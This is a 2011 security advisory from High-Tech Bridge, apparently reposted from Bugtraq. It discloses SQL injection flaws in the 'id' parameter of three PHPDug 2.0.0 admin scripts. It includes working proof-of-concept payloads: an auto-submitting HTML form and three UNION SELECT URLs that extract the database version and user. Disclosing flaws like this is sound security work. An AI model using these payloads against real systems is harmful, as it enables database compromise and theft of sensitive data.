HTB22972: Multiple SQL injection vulnerabilities in PHPDug

From: advisory@htbridge.ch
To: bugtraq@securityfocus.com
Cc:
Subject: HTB22972: Multiple SQL injection vulnerabilities in PHPDug
Date:


Vulnerability ID: HTB22972
Reference: http://www.htbridge.ch/advisory/multiple_sql_injection_vulnerabilities_in_phpdug.html
Product: PHPDug
Vendor: Kubelabs.com ( http://www.kubelabs.com/ ) 
Vulnerable Version: 2.0.0 and probably prior versions
Vendor Notification: 21 April 2011 
Vulnerability Type: SQL Injection
Risk level: Low 
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ ) 

Vulnerability Details:
The vulnerability exists due to failure in the "adm/admin_edit.php", "adm/usergroup_edit.php", "adm/category_edit.php" scripts to properly sanitize user-supplied input in "id" variables. Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.

Attacker can use browser to exploit this vulnerability. The following PoC is available:
1.

<form action="http://host/adm/admin_edit.php" method="post" name="main">
<input type="hidden" name="id[1]" value="1'SQL_CODE">
<input type="hidden" name="username[1]" value="Admin">
<input type="hidden" name="password[1]" value="Admin">
<input type="hidden" name="Submit" value="Submit">
</form>
<script>
document.main.submit();
</script>


2.

http://host/adm/admin_edit.php?id=999'+UNION+SELECT+version(),user(),3+--+


3.

http://host/adm/usergroup_edit.php?id=999%27+UNION+SELECT+version%28%29,user%28%29,3,4+--+


4.

http://host/adm/category_edit.php?id=999%27+UNION+SELECT+user%28%29,version%28%29,3+--+







Copyright © 1995-2019 LinuxRocket.net. All rights reserved.